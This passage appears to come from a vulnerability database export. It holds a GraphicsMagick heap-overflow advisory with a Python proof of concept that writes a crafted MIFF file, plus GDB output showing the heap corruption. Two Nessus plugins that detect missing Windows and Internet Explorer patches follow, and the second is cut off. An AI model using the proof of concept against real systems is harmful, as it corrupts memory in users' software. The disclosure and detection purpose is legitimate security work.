visual image directory. \n846 */ \n847 image_info=CloneImageInfo((ImageInfo *) NULL); \n848 (void) CloneString(&image_info->size,\"64x64\"); \n849 (void) fprintf(file,\" Directory:\\n\"); \n850 for (p=image->directory; *p != '\\0'; p++) \n851 { \n852 q=p; \n853 while ((*q != '\\n') && (*q != '\\0')) \n854 q++; \n855 (void) strncpy(image_info->filename,p,q-p); \n856 image_info->filename[q-p]='\\0'; \n857 p=q; \n... \n880 } \n881 DestroyImageInfo(image_info); \n \nSince the field filename in the ImageInfo struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name. \n \n \ntype = struct _ImageInfo { \n... \nFILE *file; \nchar magick[2053]; \nchar filename[2053]; \n_CacheInfoPtr_ cache; \nvoid *definitions; \nImage *attributes; \nunsigned int ping; \nPreviewType preview_type; \nunsigned int affirm; \n_BlobInfoPtr_ blob; \nsize_t length; \nchar unique[2053]; \nchar zero[2053]; \nunsigned long signature; \n} \n \nOne possible way to trigger the vulnerability is to run the identify command on a specially crafted MIFF format file with the verbose flag. \n \nProof of Concept \nThe following proof of concept script will generate a specially crafted MIFF file exploit.miff. \n''' \n \n#!/usr/bin/python \n \nfrom pwn import * \n \npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' + \n'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\n\\x0c\\n' + \n':\\x1a', \n'\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n') \noutput = \"exploit.miff\" \n \ndef main(): \npayload = \"A\"*10000 \npayload = partitions[0] + payload + partitions[1] \nfile(output, \"w\").write(payload) \n \nif __name__ == \"__main__\": \nmain() \n \n''' \nRunning the GraphicsMagick gm utility with the arguments identify -verbose in GDB and breaking after the vulnerable strncpy call, and examining the corrupted ImageInfo object demonstrates that the heap corruption was successful. \n \n \ngefa$? r identify -verbose exploit.miff \n... \ngefa$? br describe.c:856 \nBreakpoint 1 at 0x4571df: file magick/describe.c, line 856. \n... \ngefa$? p *image_info \n$3 = { \n... \ncompression = UndefinedCompression, \nfile = 0x0, \nmagick = '\\000' <repeats 2052 times>, \nfilename = 'A' <repeats 2053 times>, \ncache = 0x4141414141414141, \ndefinitions = 0x4141414141414141, \nattributes = 0x4141414141414141, \nping = 0x41414141, \npreview_type = 1094795585, \naffirm = 0x41414141, \nblob = 0x4141414141414141, \nlength = 0x4141414141414141, \nunique = 'A' <repeats 2053 times>, \nzero = 'A' <repeats 2053 times>, \nsignature = 0x4141414141414141 \n} \n''' \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/144878/graphicsmagick-discloseoverflow.txt"}], "nessus": [{"lastseen": "2019-12-13T09:18:16", "bulletinFamily": "scanner", "description": "The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11813,\n CVE-2017-11822)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS17_OCT_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/104895", "published": "2017-11-30T00:00:00", "title": "Security Updates for Internet Explorer (October 2017)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104895);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/08/03 11:35:09\");\n\n script_cve_id(\n \"CVE-2017-11790\",\n \"CVE-2017-11793\",\n \"CVE-2017-11810\",\n \"CVE-2017-11813\",\n \"CVE-2017-11822\"\n );\n script_bugtraq_id(\n 101077,\n 101081,\n 101083,\n 101122,\n 101141\n );\n script_xref(name:\"MSKB\", value:\"4041681\");\n script_xref(name:\"MSKB\", value:\"4041690\");\n script_xref(name:\"MSKB\", value:\"4041693\");\n script_xref(name:\"MSKB\", value:\"4040685\");\n script_xref(name:\"MSFT\", value:\"MS17-4041681\");\n script_xref(name:\"MSFT\", value:\"MS17-4041690\");\n script_xref(name:\"MSFT\", value:\"MS17-4041693\");\n script_xref(name:\"MSFT\", value:\"MS17-4040685\");\n\n script_name(english:\"Security Updates for Internet Explorer (October 2017)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11813,\n CVE-2017-11822)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\");\n # https://support.microsoft.com/en-us/help/4041681/windows-7-update-kb4041681\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1d1a2595\");\n # https://support.microsoft.com/en-us/help/4041690/windows-server-2012-update-kb4041690\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e258896f\");\n # https://support.microsoft.com/en-us/help/4041693/windows-81-update-kb4041693\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1c3325f2\");\n # https://support.microsoft.com/en-us/help/4040685/cumulative-security-update-for-internet-explorer\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?86f61c93\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released security updates for the affected versions of Internet Explorer.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\"); \n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-10';\nkbs = make_list(\n '4041681',\n '4041690',\n '4041693',\n '4040685'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.18817\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4040685\") ||\n\n # Windows Server 2012\n # Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"10.0.9200.22277\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4040685\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.18817\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4040685\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21061\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4040685\")\n)\n{\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB4040685 : Cumulative Security Update for Internet Explorer\\n';\n if(os == \"6.3\")\n {\n report += ' - KB4041693 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-10', kb:'4041693', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB4041690 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-10', kb:'4041690', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB4041681 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-10', kb:'4041681', report);\n }\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:18:16", "bulletinFamily": "scanner", "description": "The remote Windows host is missing multiple security updates released\non 2017/10/10. It is, therefore, affected by multiple\nvulnerabilities :\n\n- A buffer overflow vulnerability exists in the Microsoft JET\n Database Engine that could allow remote code execution on an\n affected system. An attacker who successfully exploited this\n vulnerability could take complete control of an affected system.\n (CVE-2017-0250)\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel-mode driver fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8689, CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft\n JET Database Engine that could allow remote code\n execution on an affected system. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8717,\n CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the\n way that the Windows SMB Server handles certain\n requests. An authenticated attacker who successfully\n exploited this vulnerability could craft a special\n packet, which could lead to information disclosure from\n the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-11762,\n CVE-2017-11763)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the\n Microsoft Server Block Message (SMB) when an attacker\n sends specially crafted requests to the server. An\n attacker who exploited this vulnerability could cause\n the affected system to crash. To attempt to exploit this\n issue, an attacker would need to send specially crafted\n SMB requests to the target system. Note that the denial\n of service vulnerability would not allow an attacker to\n execute code or to elevate their user rights, but it\n could cause the affected system to stop accepting\n requests. The security update addresses the\n vulnerability by correcting the manner in which SMB\n handles specially crafted client requests.\n (CVE-2017-11781)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11822)\n\n - An Information disclosure vulnerability exists when\n Windows Search improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11772)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2017-11780)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-11784,\n CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows\n implementation of wireless networking. An attacker who\n successfully exploited this vulnerability could\n potentially replay broadcast and/or multicast traffic\n to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS17_OCT_WIN2008.NASL", "href": "https://www.tenable.com/plugins/nessus/103816", "published": "2017-10-12T00:00:00", "title": "Windows 2008 October 2017 Multiple Security Updates (KRACK)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103816);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-0250\",\n \"CVE-2017-8689\",\n \"CVE-2017-8694\",\n \"CVE-2017-8717\",\n \"CVE-2017-8718\",\n \"CVE-2017-11762\",\n \"CVE-2017-11763\",\n \"CVE-2017-11765\",\n \"CVE-2017-11771\",\n \"CVE-2017-11772\",\n \"CVE-2017-11780\",\n \"CVE-2017-11781\",\n \"CVE-2017-11784\",\n \"CVE-2017-11785\",\n \"CVE-2017-11790\",\n \"CVE-2017-11793\",\n \"CVE-2017-11810\",\n \"CVE-2017-11814\",\n \"CVE-2017-11815\",\n \"CVE-2017-11816\",\n \"CVE-2017-11817\",\n \"CVE-2017-11822\",\n \"CVE-2017-11824\",\n \"CVE-2017-13080\"\n );\n script_bugtraq_id(\n 98100,\n 101077,\n 101081,\n 101093,\n 101094,\n 101095,\n 101099,\n 101100,\n 101108,\n 101109,\n 101110,\n 101111,\n 101114,\n 101116,\n 101122,\n 101128,\n 101136,\n 101140,\n 101141,\n 101147,\n 101149,\n 101161,\n 101162,\n 101274\n );\n script_xref(name:\"MSKB\", value:\"4042050\");\n script_xref(name:\"MSFT\", value:\"MS17-4042050\");\n script_xref(name:\"MSKB\", value:\"4041671\");\n script_xref(name:\"IAVA\", value:\"2017-A-0310\");\n script_xref(name:\"MSFT\", value:\"MS17-4041671\");\n script_xref(name:\"MSKB\", value:\"4041944\");\n script_xref(name:\"MSFT\", value:\"MS17-4041944\");\n script_xref(name:\"MSKB\", value:\"4041995\");\n script_xref(name:\"MSFT\", value:\"MS17-4041995\");\n script_xref(name:\"MSKB\", value:\"4050795\");\n script_xref(name:\"MSFT\", value:\"MS17-4050795\");\n script_xref(name:\"MSKB\", value:\"4042067\");\n script_xref(name:\"MSFT\", value:\"MS17-4042067\");\n script_xref(name:\"MSKB\", value:\"4042120\");\n script_xref(name:\"MSFT\", value:\"MS17-4042120\");\n script_xref(name:\"MSKB\", value:\"4042121\");\n script_xref(name:\"MSFT\", value:\"MS17-4042121\");\n script_xref(name:\"MSKB\", value:\"4042122\");\n script_xref(name:\"MSFT\", value:\"MS17-4042122\");\n\n script_name(english:\"Windows 2008 October 2017 Multiple Security Updates (KRACK)\");\n script_summary(english:\"Checks the existence of Windows Server 2008 October 2017 Patches.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing multiple security updates released\non 2017/10/10. It is, therefore, affected by multiple\nvulnerabilities :\n\n- A buffer overflow vulnerability exists in the Microsoft JET\n Database Engine that could allow remote code execution on an\n affected system. An attacker who successfully exploited this\n vulnerability could take complete control of an affected system.\n (CVE-2017-0250)\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel-mode driver fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8689, CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft\n JET Database Engine that could allow remote code\n execution on an affected system. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8717,\n CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the\n way that the Windows SMB Server handles certain\n requests. An authenticated attacker who successfully\n exploited this vulnerability could craft a special\n packet, which could lead to information disclosure from\n the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-11762,\n CVE-2017-11763)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the\n Microsoft Server Block Message (SMB) when an attacker\n sends specially crafted requests to the server. An\n attacker who exploited this vulnerability could cause\n the affected system to crash. To attempt to exploit this\n issue, an attacker would need to send specially crafted\n SMB requests to the target system. Note that the denial\n of service vulnerability would not allow an attacker to\n execute code or to elevate their user rights, but it\n could cause the affected system to stop accepting\n requests. The security update addresses the\n vulnerability by correcting the manner in which SMB\n handles specially crafted client requests.\n (CVE-2017-11781)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11822)\n\n - An Information disclosure vulnerability exists when\n Windows Search improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11772)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2017-11780)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-11784,\n CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows\n implementation of wireless networking. An attacker who\n successfully exploited this vulnerability could\n potentially replay broadcast and/or multicast traffic\n to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)\");\n # https://support.microsoft.com/en-us/help/4042050/security-update-for-the-microsoft-jet-database-engine-remote-code-exec\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?47cf0955\");\n # https://support.microsoft.com/en-us/help/4050795/unexpected-error-from-external-database-driver-error-when-you-create-o\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9ef65f13\");\n # https://support.microsoft.com/en-us/help/4041995/security-update-for-the-windows-smb-vulnerabilities-in-windows-server\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cdb3c598\");\n # https://support.microsoft.com/en-us/help/4042067/security-update-for-search-vulnerabilities-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?492474c1\");\n # https://support.microsoft.com/en-us/help/4041671/security-update-for-the-windows-kernel-information-disclosure-vulnerab\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?11033575\");\n # https://support.microsoft.com/en-us/help/4042122/security-update-for-vulnerabilities-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?41b63a5b\");\n # https://support.microsoft.com/en-us/help/4042120/security-update-for-vulnerabilities-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9e644606\");\n # https://support.microsoft.com/en-us/help/4042121/security-update-for-vulnerabilities-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53858948\");\n # https://support.microsoft.com/en-us/help/4040685/cumulative-security-update-for-internet-explorer\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?86f61c93\");\n # https://support.microsoft.com/en-us/help/4041944/windows-information-disclosure-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e2287b5e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the following security updates :\n\n - 4041671\n - 4041944\n - 4041995\n - 4050795\n - 4042067\n - 4042120\n - 4042121\n - 4042122\n - 4042050\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11771\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-10';\n\nkbs = make_list(\n \"4032201\",\n \"4034786\",\n \"4038874\",\n \"4039038\",\n \"4039266\",\n \"4039325\",\n \"4039384\"\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KBs only apply to Windows 2008\nif (hotfix_check_sp_range(vista:'2') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nsystemroot = hotfix_get_systemroot();\nif (!systemroot) audit(AUDIT_PATH_NOT_DETERMINED, 'system root');\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nwinsxs = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:\"\\1\\WinSxS\", string:systemroot);\nwinsxs_share = hotfix_path2share(path:systemroot);\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:winsxs_share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, winsxs_share);\n}\n\nthe_session = make_array(\n 'login', login,\n 'password', pass,\n 'domain', domain,\n 'share', winsxs_share\n);\n\nvuln = 0;\n\n# 4041671\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"os-kernel_31bf3856ad364e35\", file_pat:\"^ntoskrnl\\.exe$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24202'),\n max_versions:make_list('6.0.6002.99999'),\n bulletin:bulletin,\n 